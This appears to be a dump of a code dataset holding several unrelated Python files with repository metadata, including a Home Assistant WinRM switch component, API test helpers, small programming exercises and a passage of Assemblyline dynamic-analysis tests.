session = winrm.Session(host, auth=(username, password))
response_object = session.run_ps(command)
status_code = response_object.status_code
return status_code
except Exception as e:
_LOGGER.error("State command failed: %s on host: %s. %s" % (command, host, e))
@property
def should_poll(self):
"""Only poll if we have state command."""
return self._command_state is not None
@property
def name(self):
"""Return the name of the switch."""
return self._name
@property
def is_on(self):
"""Return true if device is on."""
return self._state
@property
def assumed_state(self):
"""Return true if we do optimistic updates."""
return self._command_state is None
def _query_state(self):
"""Query for state."""
if not self._command_state:
_LOGGER.error("No state command specified")
return
if self._value_template:
return CommandSwitch._query_state_value(
self._command_state, self._host, self._password, self._username,
)
return CommandSwitch._query_state_code(
self._command_state, self._host, self._password, self._username,
)
def update(self):
"""Update device state."""
if self._command_state:
payload = str(self._query_state())
if self._value_template:
payload = self._value_template.render_with_possible_json_value(payload)
self._state = payload.lower() == "true"
def turn_on(self, **kwargs):
"""Turn the device on."""
if (
CommandSwitch._switch(
self._command_on, self._host, self._password, self._username
)
and not self._command_state
):
self._state = True
self.schedule_update_ha_state()
def turn_off(self, **kwargs):
"""Turn the device off."""
if (
CommandSwitch._switch(
self._command_off, self._host, self._password, self._username
)
and not self._command_state
):
self._state = False
self.schedule_update_ha_state()
| 31.760369 | 90 | 0.614335 | """Support for winrm commands to turn a switch on/off."""
import logging
import winrm
import voluptuous as vol
from homeassistant.components.switch import (
ENTITY_ID_FORMAT,
PLATFORM_SCHEMA,
SwitchDevice,
)
from homeassistant.const import (
CONF_COMMAND_OFF,
CONF_COMMAND_ON,
CONF_COMMAND_STATE,
CONF_HOST,
CONF_NAME,
CONF_PASSWORD,
CONF_FRIENDLY_NAME,
CONF_SWITCHES,
CONF_USERNAME,
CONF_VALUE_TEMPLATE,
)
from .const import DOMAIN
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
SWITCH_SCHEMA = vol.Schema(
{
vol.Optional(CONF_COMMAND_OFF, default="true"): cv.string,
vol.Optional(CONF_COMMAND_ON, default="true"): cv.string,
vol.Optional(CONF_COMMAND_STATE): cv.string,
vol.Optional(CONF_FRIENDLY_NAME): cv.string,
vol.Optional(CONF_HOST): cv.string,
vol.Optional(CONF_PASSWORD): cv.string,
vol.Optional(CONF_USERNAME): cv.string,
vol.Optional(CONF_VALUE_TEMPLATE): cv.template,
}
)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{vol.Required(CONF_SWITCHES): cv.schema_with_slug_keys(SWITCH_SCHEMA)}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Find and return switches controlled by shell commands."""
devices = config.get(CONF_SWITCHES, {})
switches = []
for object_id, device_config in devices.items():
value_template = device_config.get(CONF_VALUE_TEMPLATE)
if value_template is not None:
value_template.hass = hass
switches.append(
CommandSwitch(
hass,
object_id,
device_config.get(CONF_FRIENDLY_NAME, object_id),
device_config.get(CONF_COMMAND_ON),
device_config.get(CONF_COMMAND_OFF),
device_config.get(CONF_COMMAND_STATE),
device_config.get(CONF_HOST),
device_config.get(CONF_PASSWORD),
device_config.get(CONF_USERNAME),
value_template,
)
)
if not switches:
_LOGGER.error("No switches added")
return False
add_entities(switches)
class CommandSwitch(SwitchDevice):
"""Representation a switch that can be toggled using shell commands."""
def __init__(
self,
hass,
object_id,
friendly_name,
command_on,
command_off,
command_state,
host,
password,
username,
value_template,
):
"""Initialize the switch."""
self._hass = hass
self.entity_id = ENTITY_ID_FORMAT.format(object_id)
self._name = friendly_name
self._state = False
self._command_on = command_on
self._command_off = command_off
self._command_state = command_state
self._host = host
self._password = password
self._username = username
self._value_template = value_template
@staticmethod
def _switch(command, host, password, username):
"""Execute the actual commands."""
_LOGGER.info("Running command: %s on host: %s" % (command, host))
try:
session = winrm.Session(host, auth=(username, password))
response_object = session.run_ps(command)
success = response_object.status_code == 0
except Exception as e:
_LOGGER.error("Command failed: %s on host: %s. %s" % (command, host, e))
_LOGGER.error(" %s" % (e))
if not success:
_LOGGER.error("Command failed: %s on host: %s" % (command, host))
return success
@staticmethod
def _query_state_value(command, host, password, username):
"""Execute state command for return value."""
_LOGGER.info("Running state command: %s on host: %s" % (command, host))
try:
session = winrm.Session(host, auth=(username, password))
response_object = session.run_ps(command)
std_out = response_object.std_out.strip().decode("utf-8")
std_err = response_object.std_err.strip().decode("utf-8")
status_code = response_object.status_code
return std_out
except Exception as e:
_LOGGER.error("State command failed: %s on host: %s. %s" % (command, host, e))
@staticmethod
def _query_state_code(command, host, password, username):
"""Execute state command for return code."""
_LOGGER.info("Running state command: %s on host: %s" % (command, host))
try:
session = winrm.Session(host, auth=(username, password))
response_object = session.run_ps(command)
status_code = response_object.status_code
return status_code
except Exception as e:
_LOGGER.error("State command failed: %s on host: %s. %s" % (command, host, e))
@property
def should_poll(self):
"""Only poll if we have state command."""
return self._command_state is not None
@property
def name(self):
"""Return the name of the switch."""
return self._name
@property
def is_on(self):
"""Return true if device is on."""
return self._state
@property
def assumed_state(self):
"""Return true if we do optimistic updates."""
return self._command_state is None
def _query_state(self):
"""Query for state."""
if not self._command_state:
_LOGGER.error("No state command specified")
return
if self._value_template:
return CommandSwitch._query_state_value(
self._command_state, self._host, self._password, self._username,
)
return CommandSwitch._query_state_code(
self._command_state, self._host, self._password, self._username,
)
def update(self):
"""Update device state."""
if self._command_state:
payload = str(self._query_state())
if self._value_template:
payload = self._value_template.render_with_possible_json_value(payload)
self._state = payload.lower() == "true"
def turn_on(self, **kwargs):
"""Turn the device on."""
if (
CommandSwitch._switch(
self._command_on, self._host, self._password, self._username
)
and not self._command_state
):
self._state = True
self.schedule_update_ha_state()
def turn_off(self, **kwargs):
"""Turn the device off."""
if (
CommandSwitch._switch(
self._command_off, self._host, self._password, self._username
)
and not self._command_state
):
self._state = False
self.schedule_update_ha_state()
| 0 | 0 | 0 |
eba0e69cd304f00bad84194c49e2a9dd42e953f7 | 1,343 | py | Python | tests/load_test_modules.py | ajylee/call_map | 21e7684b0814eae6f16cd4bc75597dc4e9239ec0 | [
"BSD-2-Clause"
] | 20 | 2017-12-24T00:19:15.000Z | 2021-11-15T07:42:25.000Z | tests/load_test_modules.py | ajylee/call_map | 21e7684b0814eae6f16cd4bc75597dc4e9239ec0 | [
"BSD-2-Clause"
] | 1 | 2017-10-22T21:03:41.000Z | 2017-12-24T04:26:22.000Z | tests/load_test_modules.py | ajylee/call_map | 21e7684b0814eae6f16cd4bc75597dc4e9239ec0 | [
"BSD-2-Clause"
] | 2 | 2017-11-04T10:06:59.000Z | 2019-08-01T22:24:49.000Z | import toolz as tz
from call_map.core import UserScopeSettings, ScopeSettings, OrganizerNode
from call_map.jedi_dump import make_scope_settings
from call_map import project_settings_module
from call_map.project_settings_module import Project
from pathlib import Path
from sys import path as runtime_sys_path
test_modules_dir = Path(__file__).parent.joinpath('test_modules')
user_scope_settings = UserScopeSettings(
module_names=[],
file_names=test_modules_dir.glob('*.py'),
include_runtime_sys_path=True,
add_to_sys_path=([str(test_modules_dir)] + runtime_sys_path),
)
scope_settings = make_scope_settings(is_new_project=True,
saved_scope_settings=ScopeSettings([], [], []),
user_scope_settings=user_scope_settings) # type: ScopeSettings
project = Project(None)
project.settings.update(
{project_settings_module.modules: scope_settings.module_names,
project_settings_module.scripts: scope_settings.scripts,
project_settings_module.sys_path: scope_settings.effective_sys_path})
project.make_platform_specific_nodes('python')
root_node = OrganizerNode('Root', [],
list(tz.concatv(project.module_nodes['python'].values(),
project.script_nodes['python'].values())))
| 38.371429 | 100 | 0.724497 | import toolz as tz
from call_map.core import UserScopeSettings, ScopeSettings, OrganizerNode
from call_map.jedi_dump import make_scope_settings
from call_map import project_settings_module
from call_map.project_settings_module import Project
from pathlib import Path
from sys import path as runtime_sys_path
test_modules_dir = Path(__file__).parent.joinpath('test_modules')
user_scope_settings = UserScopeSettings(
module_names=[],
file_names=test_modules_dir.glob('*.py'),
include_runtime_sys_path=True,
add_to_sys_path=([str(test_modules_dir)] + runtime_sys_path),
)
scope_settings = make_scope_settings(is_new_project=True,
saved_scope_settings=ScopeSettings([], [], []),
user_scope_settings=user_scope_settings) # type: ScopeSettings
project = Project(None)
project.settings.update(
{project_settings_module.modules: scope_settings.module_names,
project_settings_module.scripts: scope_settings.scripts,
project_settings_module.sys_path: scope_settings.effective_sys_path})
project.make_platform_specific_nodes('python')
root_node = OrganizerNode('Root', [],
list(tz.concatv(project.module_nodes['python'].values(),
project.script_nodes['python'].values())))
| 0 | 0 | 0 |
33c6dc9bc3088a119e8d12ba191f0d976185b79d | 4,859 | py | Python | tests/AerTestCase.py | ethaeris/aeris-apisdk-py | 0aa41a3a50e5822fa2dabd7ff531588435b9eeb8 | [
"Apache-2.0"
] | null | null | null | tests/AerTestCase.py | ethaeris/aeris-apisdk-py | 0aa41a3a50e5822fa2dabd7ff531588435b9eeb8 | [
"Apache-2.0"
] | 2 | 2020-03-17T00:34:09.000Z | 2020-03-18T19:03:47.000Z | tests/AerTestCase.py | ethaeris/aeris-apisdk-py | 0aa41a3a50e5822fa2dabd7ff531588435b9eeb8 | [
"Apache-2.0"
] | 2 | 2020-02-13T01:33:02.000Z | 2020-04-01T21:03:08.000Z | # Copyright 2020 Aeris Communications Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import unittest
| 42.252174 | 117 | 0.643754 | # Copyright 2020 Aeris Communications Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import unittest
class AerTestCase(unittest.TestCase):
__default_response_headers = {'Content-Type': 'application/json'}
"""
A class with basic methods for testing HTTP API calls.
"""
def create_empty_request_empty_response_assertion(self, response_status,
response_headers=__default_response_headers):
"""
Creates a "responses" callback that checks that the request body is non-existent, and that produces
an empty response body with a status code equal to the given response_status.
Assumes that the request will be sending a query parameter 'apiKey' with value equal to your subclass' apiKey
Parameters
----------
response_status
response_headers: obj
the headers you want the response to have
Returns
-------
"""
return self.create_body_assertion(None, {'apiKey': self.apiKey}, '', response_headers,
response_status=response_status)
def create_body_assertion(self, expected_request_body, expected_request_query_params, response_body,
response_headers=__default_response_headers, response_status=200):
"""
Creates a "responses" callback that checks attributes of the request ("expected_request_*")
and returns a response with the desired attributes ("response_*").
Only works for JSON data.
Parameters
----------
expected_request_body: obj
the body you expect to be sent with the request
expected_request_query_params: obj
the query params you expect to be sent with the request
response_body: obj
the body you want the HTTP response to contain
response_headers: obj
the headers you want the HTTP response to have
response_status: int
Returns
-------
a function you can give to the keyword argument "callback" of "responses.add"
"""
def request_callback(request):
# check the request query parameters
if expected_request_query_params:
self.assertEqual(len(expected_request_query_params), len(request.params))
for param in request.params:
# the 'first' key in request.params will have the URL path before the query string
sane_param = param
if '?' in param:
sane_param = param.split('?')[1]
self.assertEqual(request.params[param], expected_request_query_params[sane_param])
# check the request body
if expected_request_body is None:
self.assertEqual(expected_request_body, request.body)
else:
self.assertEqual(expected_request_body, json.loads(request.body))
if response_body is None:
string_response_body = None
elif isinstance(response_body, str):
string_response_body = response_body
else:
string_response_body = json.dumps(response_body)
return (response_status, response_headers, string_response_body)
return request_callback
def verify_api_exception(self, exception, expected_status_code, expected_body,
expected_headers=__default_response_headers):
"""
Verifies that an API exception has the fields that would be useful to troubleshooters.
Parameters
----------
exception: ApiException
the API exception
expected_status_code: int
the HTTP status code expected to be buried in the exception
expected_body: str
the response body you expect to be buried in the exception
expected_headers: dict
the response headers you expect to be buried in the exception
Returns
-------
None
"""
self.assertEqual(expected_status_code, exception.response.status_code)
self.assertEqual(expected_body, exception.response.text)
self.assertEqual(expected_headers, exception.response.headers)
| 1,177 | 3,039 | 23 |
dbed7dab81dfda63e6fd738a8beb4beebb04f259 | 279 | py | Python | mundo-1/ex031.py | pablocarracci/cev-python | dd6c2db80be84ec732fc5efd895e11d48d298258 | [
"MIT"
] | null | null | null | mundo-1/ex031.py | pablocarracci/cev-python | dd6c2db80be84ec732fc5efd895e11d48d298258 | [
"MIT"
] | null | null | null | mundo-1/ex031.py | pablocarracci/cev-python | dd6c2db80be84ec732fc5efd895e11d48d298258 | [
"MIT"
] | null | null | null | # Exercício 031 - Custo da Viagem
km = float(input('Qual é a distância da sua viagem? '))
if km <= 200:
preco = 0.50 * km
else:
preco = 0.45 * km
print(f'Você está prestes a começar uma viagem de {km:.1f}Km.')
print(f'E o preço da sua passagem será de R${preco:.2f}')
| 23.25 | 63 | 0.645161 | # Exercício 031 - Custo da Viagem
km = float(input('Qual é a distância da sua viagem? '))
if km <= 200:
preco = 0.50 * km
else:
preco = 0.45 * km
print(f'Você está prestes a começar uma viagem de {km:.1f}Km.')
print(f'E o preço da sua passagem será de R${preco:.2f}')
| 0 | 0 | 0 |
8138fb939138f4babd6b5222fe85dfa78fe12bb5 | 1,899 | py | Python | Apps/phdigitalshadows/dsapi/service/ds_abstract_service.py | ryanbsaunders/phantom-apps | 1befda793a08d366fbd443894f993efb1baf9635 | [
"Apache-2.0"
] | 74 | 2019-10-22T02:00:53.000Z | 2022-03-15T12:56:13.000Z | Apps/phdigitalshadows/dsapi/service/ds_abstract_service.py | ryanbsaunders/phantom-apps | 1befda793a08d366fbd443894f993efb1baf9635 | [
"Apache-2.0"
] | 375 | 2019-10-22T20:53:50.000Z | 2021-11-09T21:28:43.000Z | Apps/phdigitalshadows/dsapi/service/ds_abstract_service.py | ryanbsaunders/phantom-apps | 1befda793a08d366fbd443894f993efb1baf9635 | [
"Apache-2.0"
] | 175 | 2019-10-23T15:30:42.000Z | 2021-11-05T21:33:31.000Z | # File: ds_abstract_service.py
#
# Licensed under Apache 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt)
#
from abc import ABCMeta
from ..httplib2 import Http, ProxyInfo, socks, proxy_info_from_environment
from dsapi.config.ds_proxy_config import DSProxyConfig
class DSAbstractService(object, metaclass=ABCMeta):
"""
Abstract Service that provides http methods to implementing services.
Proxy Settings - By default this class will use proxy settings from the environment.
For more control, pass a DSProxyConfig object as the keyword argument 'proxy' to
this class. The keyword argument will take precedence.
"""
def _prepare_proxy(self, ds_proxy_config):
"""
Transform a DSProxyConfig object to httplib ProxyInfo object
:type ds_proxy_config: DSProxyConfig
:return: ProxyInfo
"""
proxy_type_map = {
DSProxyConfig.Type.HTTP: socks.PROXY_TYPE_HTTP,
DSProxyConfig.Type.HTTP_NO_TUNNEL: socks.PROXY_TYPE_HTTP_NO_TUNNEL,
DSProxyConfig.Type.SOCKS4: socks.PROXY_TYPE_SOCKS4,
DSProxyConfig.Type.SOCKS5: socks.PROXY_TYPE_SOCKS5
}
return ProxyInfo(
proxy_type=proxy_type_map[ds_proxy_config.proxy_type],
proxy_host=ds_proxy_config.proxy_host,
proxy_port=ds_proxy_config.proxy_port,
proxy_rdns=ds_proxy_config.proxy_reverse_dns,
proxy_user=ds_proxy_config.proxy_user,
proxy_pass=ds_proxy_config.proxy_pass
)
| 35.830189 | 88 | 0.695103 | # File: ds_abstract_service.py
#
# Licensed under Apache 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt)
#
from abc import ABCMeta
from ..httplib2 import Http, ProxyInfo, socks, proxy_info_from_environment
from dsapi.config.ds_proxy_config import DSProxyConfig
class DSAbstractService(object, metaclass=ABCMeta):
"""
Abstract Service that provides http methods to implementing services.
Proxy Settings - By default this class will use proxy settings from the environment.
For more control, pass a DSProxyConfig object as the keyword argument 'proxy' to
this class. The keyword argument will take precedence.
"""
def __init__(self, proxy=None):
if proxy is None:
proxy = proxy_info_from_environment()
else:
proxy = self._prepare_proxy(proxy)
self._http = Http(proxy_info=proxy)
def _request(self, url, method='GET', body=None, headers=None):
return self._http.request(url, method=method, body=body, headers=headers)
def _prepare_proxy(self, ds_proxy_config):
"""
Transform a DSProxyConfig object to httplib ProxyInfo object
:type ds_proxy_config: DSProxyConfig
:return: ProxyInfo
"""
proxy_type_map = {
DSProxyConfig.Type.HTTP: socks.PROXY_TYPE_HTTP,
DSProxyConfig.Type.HTTP_NO_TUNNEL: socks.PROXY_TYPE_HTTP_NO_TUNNEL,
DSProxyConfig.Type.SOCKS4: socks.PROXY_TYPE_SOCKS4,
DSProxyConfig.Type.SOCKS5: socks.PROXY_TYPE_SOCKS5
}
return ProxyInfo(
proxy_type=proxy_type_map[ds_proxy_config.proxy_type],
proxy_host=ds_proxy_config.proxy_host,
proxy_port=ds_proxy_config.proxy_port,
proxy_rdns=ds_proxy_config.proxy_reverse_dns,
proxy_user=ds_proxy_config.proxy_user,
proxy_pass=ds_proxy_config.proxy_pass
)
| 316 | 0 | 54 |
8549212bb74f6e4843b7cdc267130d4ade9f8fa2 | 292 | py | Python | coders/curso_regex/grupos/gruposEspeciais.py | flaviogf/Cursos | 2b120dbcd24a907121f58482fdcdfa01b164872c | [
"MIT"
] | 2 | 2021-02-20T23:50:07.000Z | 2021-08-15T03:04:35.000Z | coders/curso_regex/grupos/gruposEspeciais.py | flaviogf/Cursos | 2b120dbcd24a907121f58482fdcdfa01b164872c | [
"MIT"
] | 18 | 2019-08-07T02:33:00.000Z | 2021-03-18T22:52:38.000Z | coders/curso_regex/grupos/gruposEspeciais.py | flaviogf/Cursos | 2b120dbcd24a907121f58482fdcdfa01b164872c | [
"MIT"
] | 2 | 2020-09-28T13:00:09.000Z | 2021-12-30T12:21:08.000Z | import re
texto = 'Testando, grupos especias!'
texto2 = 'supermercado superacao hiperMERCADO'
# lookahead
print(re.findall(r'\w+(?=,|!)', texto))
# lookbehind
# positive
print(re.findall(r'(?<=super)\w+', texto2))
# negative
print(re.findall(r'(?<!super)mercado', texto2, re.IGNORECASE))
| 19.466667 | 62 | 0.691781 | import re
texto = 'Testando, grupos especias!'
texto2 = 'supermercado superacao hiperMERCADO'
# lookahead
print(re.findall(r'\w+(?=,|!)', texto))
# lookbehind
# positive
print(re.findall(r'(?<=super)\w+', texto2))
# negative
print(re.findall(r'(?<!super)mercado', texto2, re.IGNORECASE))
| 0 | 0 | 0 |
b7cd5d17978b44f90256038c6aa81a3a9d0d0a34 | 38,581 | py | Python | test/test_dynamic_service_helper.py | CybercentreCanada/assemblyline-v4-service | 465b4c3e231dce336b16ee37e829141d26e9738f | [
"MIT"
] | 6 | 2020-06-30T13:54:44.000Z | 2021-05-28T19:36:32.000Z | test/test_dynamic_service_helper.py | CybercentreCanada/assemblyline-v4-service | 465b4c3e231dce336b16ee37e829141d26e9738f | [
"MIT"
] | 17 | 2020-06-19T03:02:21.000Z | 2022-03-01T18:19:07.000Z | test/test_dynamic_service_helper.py | CybercentreCanada/assemblyline-v4-service | 465b4c3e231dce336b16ee37e829141d26e9738f | [
"MIT"
] | 8 | 2020-04-30T16:11:52.000Z | 2021-07-16T12:11:40.000Z | import pytest
import os
SERVICE_CONFIG_NAME = "service_manifest.yml"
TEMP_SERVICE_CONFIG_PATH = os.path.join("/tmp", SERVICE_CONFIG_NAME)
@pytest.fixture
@pytest.fixture
@pytest.fixture
| 55.115714 | 585 | 0.539462 | import pytest
import os
SERVICE_CONFIG_NAME = "service_manifest.yml"
TEMP_SERVICE_CONFIG_PATH = os.path.join("/tmp", SERVICE_CONFIG_NAME)
@pytest.fixture
def dummy_task_class():
class DummyTask:
def __init__(self):
self.supplementary = []
self.extracted = []
yield DummyTask
@pytest.fixture
def dummy_event_class():
class DummyEvent:
def __init__(self, item):
self.timestamp = item["timestamp"]
yield DummyEvent
@pytest.fixture
def dummy_request_class(dummy_task_class):
class DummyRequest(dict):
def __init__(self):
super(DummyRequest, self).__init__()
self.task = dummy_task_class()
def add_supplementary(self, path, name, description):
self.task.supplementary.append({"path": path, "name": name, "description": description})
def add_extracted(self, path, name, description):
self.task.extracted.append({"path": path, "name": name, "description": description})
yield DummyRequest
def check_artifact_equality(this, that):
if this.name == that.name and this.path == that.path and this.description == that.description \
and this.to_be_extracted == that.to_be_extracted:
return True
else:
return False
def check_section_equality(this, that) -> bool:
# Recursive method to check equality of result section and nested sections
# Heuristics also need their own equality checks
if this.heuristic and that.heuristic:
heuristic_equality = this.heuristic.definition.attack_id == that.heuristic.definition.attack_id and \
this.heuristic.definition.classification == that.heuristic.definition.classification and \
this.heuristic.definition.description == that.heuristic.definition.description and \
this.heuristic.definition.filetype == that.heuristic.definition.filetype and \
this.heuristic.definition.heur_id == that.heuristic.definition.heur_id and \
this.heuristic.definition.id == that.heuristic.definition.id and \
this.heuristic.definition.max_score == that.heuristic.definition.max_score and \
this.heuristic.definition.name == that.heuristic.definition.name and \
this.heuristic.definition.score == that.heuristic.definition.score and \
this.heuristic.definition.signature_score_map == \
that.heuristic.definition.signature_score_map
result_heuristic_equality = heuristic_equality and \
this.heuristic.attack_ids == that.heuristic.attack_ids and \
this.heuristic.frequency == that.heuristic.frequency and \
this.heuristic.heur_id == that.heuristic.heur_id and \
this.heuristic.score == that.heuristic.score and \
this.heuristic.score_map == that.heuristic.score_map and \
this.heuristic.signatures == that.heuristic.signatures
elif not this.heuristic and not that.heuristic:
result_heuristic_equality = True
else:
result_heuristic_equality = False
# Assuming we are given the "root section" at all times, it is safe to say that we don't need to confirm parent
current_section_equality = result_heuristic_equality and \
this.body == that.body and \
this.body_format == that.body_format and \
this.classification == that.classification and \
this.depth == that.depth and \
len(this.subsections) == len(that.subsections) and \
this.title_text == that.title_text
if not current_section_equality:
return False
for index, subsection in enumerate(this.subsections):
subsection_equality = check_section_equality(subsection, that.subsections[index])
if not subsection_equality:
return False
return True
def setup_module():
if not os.path.exists(TEMP_SERVICE_CONFIG_PATH):
open_manifest = open(TEMP_SERVICE_CONFIG_PATH, "w")
open_manifest.write("name: Sample\nversion: sample\ndocker_config: \n image: sample\nheuristics:\n - heur_id: 17\n name: blah\n description: blah\n filetype: '*'\n score: 250")
def teardown_module():
if os.path.exists(TEMP_SERVICE_CONFIG_PATH):
os.remove(TEMP_SERVICE_CONFIG_PATH)
class TestEvent:
@staticmethod
@pytest.mark.parametrize("pid, image, timestamp, guid",
[
(None, None, None, None,),
(1, 1, "blah", "blah",),
]
)
def test_init(pid, image, timestamp, guid):
from assemblyline_v4_service.common.dynamic_service_helper import Event
e = Event(pid, image, timestamp, guid)
assert e.pid == pid
assert e.image == image
assert e.timestamp == timestamp
assert e.guid == guid
@staticmethod
@pytest.mark.parametrize("pid, image, timestamp, guid, expected_result",
[
(None, None, None, None,
{"image": None, "pid": None, "timestamp": None, "guid": None}),
(1, "blah", 1.0, "blah",
{"image": "blah", "pid": 1, "timestamp": 1.0, "guid": "blah"}),
]
)
def test_convert_event_to_dict(pid, image, timestamp, guid, expected_result):
from assemblyline_v4_service.common.dynamic_service_helper import Event
e = Event(pid=pid, image=image, timestamp=timestamp, guid=guid)
actual_result = e.convert_event_to_dict()
assert actual_result == expected_result
@staticmethod
@pytest.mark.parametrize("path, expected_result",
[
("blah", "x86"),
("C:\\program files\\blah", "x86"),
("C:\\program files (x86)\\blah", "x86_64"),
("C:\\syswow64\\blah", "x86_64"),
]
)
def test_determine_arch(path, expected_result):
from assemblyline_v4_service.common.dynamic_service_helper import Event
e = Event(pid=1, image=path, timestamp=0, guid="blah")
actual_result = e._determine_arch(path)
assert actual_result == expected_result
@staticmethod
@pytest.mark.parametrize("path, rule, expected_result",
[
("blah", {"pattern": "", "replacement": ""}, "blah"),
("blah", {"pattern": "ah", "replacement": "ue"}, "blah"),
("blah", {"pattern": "bl", "replacement": "y"}, "yah"),
]
)
def test_pattern_substitution(path, rule, expected_result):
from assemblyline_v4_service.common.dynamic_service_helper import Event
e = Event(pid=1, image=path, timestamp=0, guid="blah")
actual_result = e._pattern_substitution(path, rule)
assert actual_result == expected_result
@staticmethod
@pytest.mark.parametrize("path, rule, expected_result",
[
("blah", {"regex": "", "replacement": ""}, "blah"),
("blah", {"regex": "bl*ah", "replacement": "bl"}, "blah"),
("blah", {"regex": "\\bl*ah", "replacement": "bl"}, "blah"),
("blaah", {"regex": "bl*ah", "replacement": "blue"}, "blue"),
]
)
def test_regex_substitution(path, rule, expected_result):
from assemblyline_v4_service.common.dynamic_service_helper import Event
e = Event(pid=1, image=path, timestamp=0, guid="blah")
actual_result = e._regex_substitution(path, rule)
assert actual_result == expected_result
@staticmethod
@pytest.mark.parametrize("path, arch, expected_result",
[
("blah", None, "blah"),
("C:\\Program Files\\Word.exe", None, "?pf86\\word.exe"),
("C:\\Program Files (x86)\\Word.exe", None, "?pf86\\word.exe"),
("C:\\Program Files (x86)\\Word.exe", "x86_64", "?pf86\\word.exe"),
("C:\\Windows\\System32\\Word.exe", None, "?sys32\\word.exe"),
("C:\\Windows\\SysWow64\\Word.exe", None, "?sys32\\word.exe"),
("C:\\Windows\\SysWow64\\Word.exe", "x86", "?win\\syswow64\\word.exe"),
("C:\\Windows\\SysWow64\\Word.exe", "x86_64", "?sys32\\word.exe"),
("C:\\Users\\buddy\\AppData\\Local\\Temp\\Word.exe", None, "?usrtmp\\word.exe"),
("C:\\Users\\buddy\\Word.exe", None, "?usr\\word.exe"),
]
)
def test_normalize_path(path, arch, expected_result):
from assemblyline_v4_service.common.dynamic_service_helper import Event
e = Event(pid=1, image=path, timestamp=0, guid="blah")
actual_result = e._normalize_path(path, arch)
assert actual_result == expected_result
class TestProcessEvent:
@staticmethod
@pytest.mark.parametrize("pid, ppid, image, command_line, timestamp",
[
(None, None, None, None, None),
(1, 1, "blah", "blah", 1.0),
]
)
def test_init(pid, ppid, image, command_line, timestamp):
from assemblyline_v4_service.common.dynamic_service_helper import ProcessEvent
p = ProcessEvent(pid=pid, ppid=ppid, image=image, command_line=command_line, timestamp=timestamp)
assert p.pid == pid
assert p.ppid == ppid
assert p.image == image
assert p.command_line == command_line
assert p.timestamp == timestamp
class TestNetworkEvent:
@staticmethod
@pytest.mark.parametrize("protocol, src_ip, src_port, domain, dest_ip, dest_port, pid, timestamp",
[
(None, None, None, None, None, None, None, None),
("blah", "blah", 1, "blah", "blah", 1, 1, 1.0),
]
)
def test_init(protocol, src_ip, src_port, domain, dest_ip, dest_port, pid, timestamp):
from assemblyline_v4_service.common.dynamic_service_helper import NetworkEvent
n = NetworkEvent(protocol=protocol, src_ip=src_ip, src_port=src_port, domain=domain, dest_ip=dest_ip, dest_port=dest_port, pid=pid, timestamp=timestamp)
assert n.protocol == protocol
assert n.src_port == src_port
assert n.domain == domain
assert n.dest_ip == dest_ip
assert n.dest_port == dest_port
assert n.pid == pid
assert n.timestamp == timestamp
class TestArtifact:
@staticmethod
@pytest.mark.parametrize("name, path, description, to_be_extracted",
[
(None, None, None, None),
("blah", "blah", "blah", True),
("blah", "blah", "blah", False),
]
)
def test_init(name, path, description, to_be_extracted):
from assemblyline_v4_service.common.dynamic_service_helper import Artifact
if any(item is None for item in [name, path, description, to_be_extracted]):
with pytest.raises(Exception):
Artifact(name=name, path=path, description=description, to_be_extracted=to_be_extracted)
return
a = Artifact(name=name, path=path, description=description, to_be_extracted=to_be_extracted)
assert a.name == name
assert a.path == path
assert a.description == description
assert a.to_be_extracted == to_be_extracted
class TestEvents:
@staticmethod
@pytest.mark.parametrize("events, expected_events, expected_sorted_events, expected_process_events, expected_network_events", [([], [], [], [], [])])
def test_init(events, expected_events, expected_sorted_events, expected_process_events, expected_network_events):
from assemblyline_v4_service.common.dynamic_service_helper import Events
e = Events(events=events)
assert e.events == expected_events
assert e.sorted_events == expected_sorted_events
assert e.process_events == expected_process_events
assert e.network_events == expected_network_events
@staticmethod
@pytest.mark.parametrize("events, validated_events_num",
[
([{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1.0, "guid": "blah", "pguid": "blah"}], 1),
([{"protocol": "blah", "src_ip": "blah", "src_port": 1, "domain": "blah", "dest_ip": "blah", "dest_port": 1, "pid": 1, "image": "blah", "timestamp": 1.0, "guid": "blah"}], 1),
([{}], 0),
]
)
def test_validate_events(events, validated_events_num):
from assemblyline_v4_service.common.dynamic_service_helper import Events
if validated_events_num:
assert len(Events._validate_events(events)) == validated_events_num
else:
with pytest.raises(ValueError):
Events._validate_events(events)
@staticmethod
@pytest.mark.parametrize("events, validated_events_num",
[
([{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1.0, "guid": "blah", "pguid": "blah"}], 1),
([{"protocol": "blah", "src_ip": "blah", "src_port": 1, "domain": "blah", "dest_ip": "blah", "dest_port": 1, "pid": 1, "image": "blah", "timestamp": 1.0, "guid": "blah"}], 0),
]
)
def test_get_process_events(events, validated_events_num):
from assemblyline_v4_service.common.dynamic_service_helper import Events
validated_events = Events._validate_events(events)
assert len(Events._get_process_events(validated_events)) == validated_events_num
@staticmethod
@pytest.mark.parametrize("events, validated_events_num",
[
([{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1.0, "guid": "blah", "pguid": "blah"}], 0),
([{"protocol": "blah", "src_ip": "blah", "src_port": 1, "domain": "blah", "dest_ip": "blah", "dest_port": 1, "pid": 1, "image": "blah", "timestamp": 1.0, "guid": "blah"}], 1),
]
)
def test_get_network_events(events, validated_events_num):
from assemblyline_v4_service.common.dynamic_service_helper import Events
validated_events = Events._validate_events(events)
assert len(Events._get_network_events(validated_events)) == validated_events_num
@staticmethod
